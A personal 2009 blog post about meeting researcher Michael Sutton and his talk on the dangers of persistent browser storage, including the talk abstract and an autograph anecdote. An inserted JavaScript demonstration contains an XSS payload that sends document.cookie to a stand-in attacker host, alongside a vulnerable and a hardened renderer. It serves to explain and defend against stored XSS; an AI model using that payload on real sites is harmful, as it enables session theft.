Thursday, July 16, 2009

A Wolf in Sheep's Clothing

Got a chance to meet Michael Sutton in person. He is in town to give a presentation on "A Wolf in Sheep's Clothing: The Dangers of Persistent Web Browser Storage". He talks about the dangers of web applications that use client-side storage, which is becoming common in web applications built on HTML 5 and Google Gears.

Abstract of his presentation:
As the line between desktop and web applications becomes increasingly blurry in a web 2.0 world, browser functionality is being pushed well beyond what it was originally intended for. Persistent client side storage has become a requirement for web applications if they are to be available both online and off. This need is being filled by a variety of technologies such as persistent cookies, Flash storage and Google Gears. While all such technologies offer great promise, it is clear that the vast majority of developers simply do not understand their security implications.

Researching a variety of currently deployed implementations of these technologies has revealed a broad scope of vulnerabilities with frightening implications. Now attackers can target victims not just once, but every time they visit a site, as the victim now carries and stores the attack with them. Imagine a scenario whereby updated confidential information is forwarded to an attacker every time a victim interacts with a given web application. The attacker no longer needs to worry about timing their attacks to ensure that the victim is authenticated, as the victim attacks himself! Limited storage? Cookies that expire? Not a problem when entire databases are accessible with virtually unlimited storage and an infinite lifespan. Think these attacks are theoretical? Think again. In this talk we dive into these technologies and break down the risk posed by them when not properly understood. We will then detail a variety of real-world vulnerabilities that have been uncovered, including a new class of cross-site scripting.
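The persistence mechanism the abstract describes, shown as an added example that is not from the talk, its slides or this post: a web application copies an attacker-supplied URL parameter into persistent client-side storage once, then trusts that stored value on every later page load, so a one-shot reflected injection becomes a stored one that the victim carries in their own browser. The storage object is a stand-in for localStorage or a Gears database (same getItem/setItem contract, an assumption made so the code runs in Node), the `displayName` key, the `?name=` parameter and the `attacker.example` host are constructed for illustration, and the hardened renderer treats storage as untrusted input exactly like a request parameter.

```javascript
// Added example (not from the talk or the blog post): how a one-shot
// injection becomes persistent when a web app stores untrusted data in
// client-side storage and later trusts it. Runs in Node; the storage object
// below is a stand-in for window.localStorage / a Gears database (assumption).

// Stand-in for window.localStorage (same getItem/setItem contract).
function createStorage() {
  const backing = new Map();
  return {
    getItem: (key) => (backing.has(key) ? backing.get(key) : null),
    setItem: (key, value) => { backing.set(key, String(value)); },
  };
}

// Constructed payload: what a reflected XSS would deliver once via a link such
// as ?name=<payload>. The application then persists it on the victim's side.
const PAYLOAD = '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">';

// "Remember my name" feature (hypothetical): copies a URL parameter into
// persistent storage. Vulnerable pattern: the raw value is stored and later trusted.
function rememberNameFromUrl(storage, queryString) {
  const params = new URLSearchParams(queryString);
  const name = params.get('name');
  if (name !== null) storage.setItem('displayName', name);
}

// Vulnerable renderer: concatenates the stored value into markup that the page
// would assign to innerHTML. The payload fires on EVERY later page load, with no
// URL parameter needed: the victim carries the attack in their browser.
function renderGreetingVulnerable(storage) {
  const name = storage.getItem('displayName') || 'guest';
  return '<p>Welcome back, ' + name + '</p>';
}

// Minimal HTML escaping for text inserted into element content.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hardened renderer: storage is treated as untrusted input, like a request
// parameter, and escaped at the point of use. In a real page, prefer
// element.textContent = name over building HTML strings at all.
function renderGreetingHardened(storage) {
  const name = storage.getItem('displayName') || 'guest';
  return '<p>Welcome back, ' + escapeHtml(name) + '</p>';
}

// Simulate two visits: the poisoned first visit, then a clean one with no
// parameter. The stored payload survives into the second visit either way;
// only the renderer decides whether it executes.
function simulateVisits() {
  const storage = createStorage();
  rememberNameFromUrl(storage, '?name=' + encodeURIComponent(PAYLOAD)); // visit 1: attacker link
  rememberNameFromUrl(storage, '');                                       // visit 2: no parameter
  return {
    vulnerable: renderGreetingVulnerable(storage),
    hardened: renderGreetingHardened(storage),
  };
}

const visits = simulateVisits();
console.log('vulnerable:', visits.vulnerable);
console.log('hardened:  ', visits.hardened);
```

The point the output makes is that clearing the URL does nothing: the second visit carries no parameter, yet the vulnerable renderer still emits the payload, because the store itself has become the injection vector. Expiring cookies does not help either, since client-side databases have no expiry unless the application sets one. Anything read back from persistent storage needs the same output encoding (or `textContent` assignment) as data arriving in a request.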

If you want to know more or are looking for the presentation slides, feel free to download them here.

Michael Sutton is a regular speaker at security conferences like BlackHat and Defcon. He is also the co-author of the book "Fuzzing: Brute Force Vulnerability Discovery" (which I happen to own). I took the opportunity to get his autograph on my book (shown below).

[Image: Autograph from Michael Sutton in my copy of "Fuzzing: Brute Force Vulnerability Discovery"]

1 comment:

freebiesutopia said...

I am interested in the slides; can you send them to my email? Thank you.